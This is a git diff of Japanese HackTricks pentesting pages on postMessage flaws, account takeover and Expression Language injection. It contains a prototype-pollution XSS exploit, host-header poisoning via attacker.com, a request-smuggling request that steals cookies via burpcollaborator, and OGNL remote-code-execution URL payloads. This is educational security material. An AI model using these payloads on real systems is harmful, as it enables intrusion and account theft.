- `String.prototype.search()`の**`search()`**メソッドは正規表現を想定しており、文字列ではありません。正規表現以外のものを渡すと、暗黙のうちに正規表現に変換され、メソッドが潜在的にセキュリティリスクを生じる可能性があります。これは、正規表現では、ピリオド(.)がワイルドカードとして機能し、特別に作成されたドメインで検証をバイパスできるためです。例:
|
||||
- `String.prototype.search()`の**`search()`**メソッドは正規表現を想定しており、文字列ではありません。正規表現以外のものを渡すと、暗黙のうちに正規表現に変換され、メソッドが潜在的にセキュリティリスクを抱える可能性があります。たとえば:
|
||||
|
||||
```javascript
|
||||
"https://www.safedomain.com".search("www.s.fedomain.com")
|
||||
```
|
||||
- `search()`と同様に、**`match()`**関数も正規表現を処理します。正規表現が適切に構築されていない場合、バイパスの可能性があります。
|
||||
- `escapeHtml`関数は、文字をエスケープして入力を無害化することを意図しています。ただし、新しいエスケープされたオブジェクトを作成せず、既存のオブジェクトのプロパティを上書きします。この動作は悪用される可能性があります。特に、オブジェクトが操作され、その制御されたプロパティが`hasOwnProperty`を認識しないようにできる場合、`escapeHtml`は期待どおりに機能しません。以下の例で示されています:
|
||||
- **`match()`**関数は、`search()`と同様に正規表現を処理します。正規表現が適切に構築されていない場合、バイパスされる可能性があります。
|
||||
- **`escapeHtml`**関数は、文字をエスケープして入力を無害化することを意図しています。ただし、新しいエスケープオブジェクトを作成せず、既存のオブジェクトのプロパティを上書きします。この動作は悪用される可能性があります。特に、オブジェクトが操作され、その制御されたプロパティが`hasOwnProperty`を認識しないようにできる場合、`escapeHtml`は期待どおりに機能しません。以下の例で示されています:
|
||||
|
||||
- 期待される失敗:
|
||||
|
||||
|
@ -138,16 +137,16 @@ result = u(new Error("'\"<b>\\"));
|
|||
result.message; // "'"<b>\"
|
||||
```
|
||||
|
||||
この脆弱性の文脈では、`File`オブジェクトは、読み取り専用の`name`プロパティを持つため、`escapeHtml`関数によって無害化されません。このプロパティは、テンプレートで使用されるときに`escapeHtml`関数によって無害化されず、潜在的なセキュリティリスクを引き起こす可能性があります。
|
||||
- JavaScriptの`document.domain`プロパティは、ドメインを短縮するためにスクリプトによって設定でき、同じ親ドメイン内でより緩和された同一オリジンポリシーの適用を可能にします。
|
||||
この脆弱性の文脈では、`File`オブジェクトは、読み取り専用の`name`プロパティを持つため、`escapeHtml`関数によって無害化されないことが特に悪用されやすいです。これは、テンプレートで使用されるときに、`escapeHtml`関数によって無害化されないため、潜在的なセキュリティリスクが発生します。
|
||||
- JavaScriptの`document.domain`プロパティは、スクリプトによってドメインを短縮するために設定でき、同じ親ドメイン内でのより緩やかな同一オリジンポリシーの適用を可能にします。
|
||||
|
||||
### e.origin == window.origin バイパス
|
||||
|
||||
%%%%%%を使用して**サンドボックス化されたiframe**にWebページを埋め込む場合、iframeのオリジンはnullに設定されることが重要です。これは、**sandbox属性**とそのセキュリティと機能への影響を考慮する際に特に重要です。
|
||||
|
||||
sandbox属性で**`allow-popups`**を指定すると、iframe内から開かれたポップアップウィンドウは親のサンドボックス制限を継承します。これは、ポップアップウィンドウのオリジンが同様に`null`に設定されるため、ポップアップウィンドウのオリジンが`null`になり、iframeのオリジンと一致する状況が生じます。
|
||||
sandbox属性で**`allow-popups`**を指定すると、iframe内から開かれたポップアップウィンドウは親のサンドボックス制限を継承します。つまり、**`allow-popups-to-escape-sandbox`**属性が含まれていない限り、ポップアップウィンドウのオリジンも同様に`null`に設定され、iframeのオリジンと一致します。
|
||||
|
||||
したがって、これらの条件下でポップアップが開かれ、iframeからポップアップに**`postMessage`**を使用してメッセージが送信されると、送信元と受信先の両方のオリジンが`null`に設定されます。この状況により、**`e.origin == window.origin`**がtrue(`null == null`)に評価されるため、iframeとポップアップは両方が`null`の同じオリジン値を共有しているためです。
|
||||
したがって、これらの条件下でポップアップが開かれ、iframeからポップアップに**`postMessage`**を使用してメッセージが送信されると、送信元と受信先の両方のオリジンが`null`に設定されます。この状況では、**`e.origin == window.origin`**がtrue(`null == null`)に評価されるため、iframeとポップアップは両方とも`null`の同じオリジン値を共有しています。
|
||||
|
||||
詳細については、以下を**読んでください**:
|
||||
|
||||
|
@ -164,18 +163,18 @@ if( received_message.source !== window ) {
|
|||
return;
|
||||
}
|
||||
```
|
||||
**メッセージ**の**`e.source`**を**null**にすることができます。**iframe**を作成し、**postMessage**を**送信**して**すぐに削除**することで。
|
||||
**メッセージ**の**`e.source`**を**null**にすることができます。これは、**`postMessage`**を**送信**し、**すぐに削除**される**`iframe`**を作成することで行います。
|
||||
|
||||
詳細は**こちらを参照:**
|
||||
詳細は、以下を**参照**してください:
|
||||
|
||||
{% content-ref url="bypassing-sop-with-iframes-2.md" %}
|
||||
[bypassing-sop-with-iframes-2.md](bypassing-sop-with-iframes-2.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### X-Frame-Header バイパス
|
||||
### X-Frame-Headerバイパス
|
||||
|
||||
これらの攻撃を実行するためには、理想的には**被害者のウェブページ**を`iframe`内に配置できると良いでしょう。しかし、`X-Frame-Header`のようなヘッダーはその**動作**を**防ぐ**ことができます。\
|
||||
そのようなシナリオでは、より洗練された攻撃を使用することができます。脆弱なウェブアプリケーションに新しいタブを開いて通信することができます。
|
||||
これらの攻撃を実行するためには、理想的には**被害者のWebページ**を`iframe`内に配置できると良いでしょう。しかし、`X-Frame-Header`のようなヘッダーは、その**動作**を**防ぐ**ことができます。\
|
||||
そのようなシナリオでは、より洗練された攻撃を使用することができます。脆弱なWebアプリケーションに新しいタブを開いて通信することができます:
|
||||
```markup
|
||||
<script>
|
||||
var w=window.open("<url>")
|
||||
|
@ -184,7 +183,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
|
|||
```
|
||||
### メインページをブロックして子に送信されたメッセージを盗む
|
||||
|
||||
次のページでは、**データを送信する前にメインページをブロック**し、**子のiframe**に送信された**機密性の高いpostmessageデータ**を盗む方法を見ることができます。そして、**子のXSSを悪用**して、データが受信される前に**データを漏洩**させます:
|
||||
次のページでは、**メイン**ページを**ブロック**してからデータを送信し、**子のiframe**に送信された**機密postmessageデータ**を盗む方法を見ることができます。そして、**子のXSSを悪用**して、データが受信される前にデータを**漏洩**させます:
|
||||
|
||||
{% content-ref url="blocking-main-page-to-steal-postmessage.md" %}
|
||||
[blocking-main-page-to-steal-postmessage.md](blocking-main-page-to-steal-postmessage.md)
|
||||
|
@ -192,7 +191,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
|
|||
|
||||
### iframeの場所を変更してメッセージを盗む
|
||||
|
||||
もし、X-Frame-Headerを持たないウェブページに別のiframeを含めることができる場合、その子iframeの場所を変更できます。そのため、**ワイルドカード**を使用して送信された**postmessage**を受信している場合、攻撃者はそのiframeの**オリジンを自分が制御するページに変更**し、メッセージを**盗む**ことができます:
|
||||
もし、X-Frame-Headerを持たないウェブページをiframe化できる場合、別のiframeを含むページの場所を変更できます。その子iframeが**ワイルドカード**を使用して送信された**postmessage**を受信している場合、攻撃者はそのiframeの**オリジン**を自分が**制御**するページに**変更**してメッセージを**盗む**ことができます:
|
||||
|
||||
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
|
||||
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
|
||||
|
@ -200,11 +199,11 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
|
|||
|
||||
### postMessageからPrototype Pollutionおよび/またはXSSへ
|
||||
|
||||
`postMessage`を介して送信されたデータがJSによって実行されるシナリオでは、**ページをiframe化**し、**prototype pollution/XSSを悪用**して、攻撃を`postMessage`を介して送信することができます。
|
||||
`postMessage`を介して送信されたデータがJSによって実行されるシナリオでは、**ページ**をiframe化して、`postMessage`を介してエクスプロイトを送信することで、**プロトタイプ汚染/XSS**を悪用できます。
|
||||
|
||||
**`postMessage`を介して非常によく説明されたXSSの例**は、[https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)で見つけることができます。
|
||||
**`postMessage`を介した非常によく説明されたXSS**の例は、[https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html) で見つけることができます。
|
||||
|
||||
**Prototype Pollutionを悪用し、その後XSSを行う**ための攻撃例を示す、`iframe`への`postMessage`を介したエクスプロイトの例:
|
||||
**プロトタイプ汚染を悪用してXSS**を行うエクスプロイトの例を、`iframe`に`postMessage`を介して送信することで示します:
|
||||
```html
|
||||
<html>
|
||||
<body>
|
||||
|
@ -220,7 +219,7 @@ setTimeout(get_code, 2000);
|
|||
</body>
|
||||
</html>
|
||||
```
|
||||
**さらに情報を得るには**:
|
||||
**さらに情報を入手するには**:
|
||||
|
||||
* [**プロトタイプ汚染**](../deserialization/nodejs-proto-prototype-pollution/)に関するページへのリンク
|
||||
* [**XSS**](../xss-cross-site-scripting/)に関するページへのリンク
|
||||
|
@ -232,11 +231,11 @@ setTimeout(get_code, 2000);
|
|||
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
|
||||
* 練習用: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -246,14 +245,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**</strong>で**ゼロからヒーローまでのAWSハッキングを学ぶ**</summary>
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**で**ゼロからヒーローまでのAWSハッキングを学ぶ**!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,23 +6,23 @@
|
|||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**する。
|
||||
- **ハッキングテクニックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出**してください。
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
- **Discordグループ**に**参加**💬(https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**🐦で**フォロー**する[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
- **ハッキングテクニックを共有する**ために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかを確認する**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかを確認する**無料**の機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -53,7 +53,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
### SQLインジェクション
|
||||
|
||||
[**このページをチェック**](sql-injection/#insert-statement)して、登録フォームで**SQLインジェクション**を使用してアカウント乗っ取りを試みたり情報を抽出したりする方法を学びます。
|
||||
[**このページをチェック**](sql-injection/#insert-statement)して、登録フォームで**SQLインジェクション**を使用してアカウント乗っ取りを試みる方法や情報を抽出する方法を学びます。
|
||||
|
||||
### Oauth乗っ取り
|
||||
|
||||
|
@ -76,7 +76,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
- **使い捨てメール**を使用できるかどうかを確認する
|
||||
- **長い** **パスワード**(>200)は**DoS**につながる
|
||||
- アカウント作成の**レート制限**を確認する
|
||||
- username@**burp\_collab**.netを使用して**コールバック**を分析する
|
||||
- username@**burp\_collab**.netを使用して、**コールバック**を分析する
|
||||
|
||||
## **パスワードリセットの乗っ取り**
|
||||
|
||||
|
@ -93,7 +93,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
1. Burp Suiteでパスワードリセットリクエストをインターセプトする
|
||||
2. Burp Suiteで次のヘッダーを追加または編集する:`Host: attacker.com`、`X-Forwarded-Host: attacker.com`
|
||||
3. 修正されたヘッダーを使用してリクエストを転送する\
|
||||
3. 修正されたヘッダーでリクエストを転送する\
|
||||
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
|
||||
4. _hostヘッダー_に基づいたパスワードリセットURLを探す:`https://attacker.com/reset-password.php?token=TOKEN`
|
||||
|
||||
|
@ -163,8 +163,8 @@ email=victim@mail.com|hacker@mail.com
|
|||
|
||||
1. **smuggler**を使用してHTTPリクエストスマグリングのタイプを検出します(CL、TE、CL.TE)\
|
||||
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
|
||||
2. `POST / HTTP/1.1`を次のデータで上書きするリクエストを作成します:\
|
||||
`GET http://something.burpcollaborator.net HTTP/1.1 X:` 目的は、被害者をburpcollabにリダイレクトしてクッキーを盗むことです。\
|
||||
2. 次のデータで`POST / HTTP/1.1`を上書きするリクエストを作成します:\
|
||||
`GET http://something.burpcollaborator.net HTTP/1.1 X:` 目的は被害者をburpcollabにリダイレクトしてクッキーを盗むことです。\
|
||||
3. 最終リクエストは次のようになります。
|
||||
```
|
||||
GET / HTTP/1.1
|
||||
|
@ -177,16 +177,16 @@ Content-Length: 83
|
|||
GET http://something.burpcollaborator.net HTTP/1.1
|
||||
X: X
|
||||
```
|
||||
### CSRFを利用したアカウント乗っ取り <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
|
||||
### アカウント乗っ取りのCSRF経由 <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
|
||||
|
||||
1. CSRF用のペイロードを作成する、例: "パスワード変更のための自動送信付きHTMLフォーム"
|
||||
2. ペイロードを送信する
|
||||
|
||||
### JWTを利用したアカウント乗っ取り <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
|
||||
### JWT経由のアカウント乗っ取り <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
|
||||
|
||||
JSON Web Tokenはユーザーの認証に使用される可能性があります。
|
||||
JSON Web Tokenはユーザーを認証するために使用される可能性があります。
|
||||
|
||||
* 別のユーザーID/メールでJWTを編集する
|
||||
* 別のユーザーID / メールでJWTを編集する
|
||||
* 弱いJWT署名をチェックする
|
||||
|
||||
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
|
||||
|
@ -198,11 +198,11 @@ JSON Web Tokenはユーザーの認証に使用される可能性があります
|
|||
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗まれたマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -213,14 +213,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからAWSハッキングをマスターしましょう</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**してください。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**してください。
|
||||
* **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,19 +4,19 @@
|
|||
|
||||
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFT](https://opensea.io/collection/the-peass-family)コレクションを見つけます
|
||||
* [**公式PEASS&HackTricks swag**](https://peass.creator-spring.com)を手に入れます
|
||||
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
|
||||
* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
|
||||
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
* **ハッキングトリックを共有するために** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください**。
|
||||
* **ハッキングトリックを共有するために** [**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください**。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -28,18 +28,18 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## 基本情報
|
||||
|
||||
Expression Language(EL)は、JavaEEにおいてプレゼンテーション層(例:Webページ)とアプリケーションロジック(例:管理されたBean)を結びつけ、それらの相互作用を可能にするために不可欠です。主に以下で使用されます:
|
||||
Expression Language(EL)は、JavaEEにおいてプレゼンテーション層(例:Webページ)とアプリケーションロジック(例:管理されたビーン)を結びつけ、それらの相互作用を可能にするために不可欠です。主に以下で使用されます:
|
||||
|
||||
- **JavaServer Faces(JSF)**:UIコンポーネントをバックエンドデータ/アクションにバインドするために。
|
||||
- **JavaServer Pages(JSP)**:JSPページ内でのデータアクセスと操作のために。
|
||||
- **Contexts and Dependency Injection for Java EE(CDI)**:Web層と管理Beanの相互作用を容易にするために。
|
||||
- **JavaServer Faces(JSF)**:UIコンポーネントをバックエンドデータ/アクションにバインドするために使用されます。
|
||||
- **JavaServer Pages(JSP)**:JSPページ内でのデータアクセスと操作に使用されます。
|
||||
- **Contexts and Dependency Injection for Java EE(CDI)**:Web層と管理されたビーンの相互作用を容易にするために使用されます。
|
||||
|
||||
**使用コンテキスト**:
|
||||
|
||||
- **Spring Framework**:セキュリティやデータなどのさまざまなモジュールで適用されます。
|
||||
- **一般的な使用**:Java、Kotlin、ScalaなどのJVMベースの言語で、開発者がSpEL APIを介して使用します。
|
||||
- **Spring Framework**:セキュリティやデータなどのさまざまなモジュールで使用されます。
|
||||
- **一般的な使用**:Java、Kotlin、ScalaなどのJVMベースの言語で、開発者によってSpEL APIを介して使用されます。
|
||||
|
||||
ELはJavaEE技術、スタンドアロン環境に存在し、`.jsp`または`.jsf`のファイル拡張子、スタックエラー、およびヘッダーで「Servlet」という用語を通じて認識できます。ただし、その機能や特定の文字の使用はバージョンに依存する場合があります。
|
||||
ELはJavaEEテクノロジ、スタンドアロン環境に存在し、`.jsp`または`.jsf`のファイル拡張子、スタックエラー、およびヘッダー内の「Servlet」などの用語を通じて認識できます。ただし、その機能や特定の文字の使用はバージョンに依存する場合があります。
|
||||
|
||||
{% hint style="info" %}
|
||||
**ELバージョン**によっては、一部の**機能**が**オン**または**オフ**になることがあり、通常、一部の**文字**が**許可されない**ことがあります。
|
||||
|
@ -47,7 +47,7 @@ ELはJavaEE技術、スタンドアロン環境に存在し、`.jsp`または`.j
|
|||
|
||||
## 基本例
|
||||
|
||||
(別の興味深いELチュートリアルは[https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/)で見つけることができます)
|
||||
(Apache StrutsでのOGNLインジェクションの悪用についての興味深いチュートリアルは[https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/)で見つけることができます)
|
||||
|
||||
[**Maven**](https://mvnrepository.com)リポジトリから次のjarファイルをダウンロードします:
|
||||
|
||||
|
@ -88,11 +88,11 @@ Enter a String to evaluate:
|
|||
{5*5}
|
||||
[25]
|
||||
```
|
||||
Note how in the previous example the term `{5*5}` was **evaluated**.
|
||||
前の例では、用語`{5*5}`が**評価**されたことに注意してください。
|
||||
|
||||
## **CVEベースのチュートリアル**
|
||||
|
||||
Check it in **this post: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
|
||||
**この投稿で確認してください: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
|
||||
|
||||
## ペイロード
|
||||
|
||||
|
@ -167,7 +167,7 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
|
|||
```bash
|
||||
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="%2fbin%2fsh",%23ssss[1]="%2dc",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
|
||||
```
|
||||
* RCE **Windows** (未検証)
|
||||
* RCE **Windows**(未検証)
|
||||
```bash
|
||||
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
|
||||
```
|
||||
|
@ -209,9 +209,9 @@ T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec
|
|||
```
|
||||
### 環境の検査
|
||||
|
||||
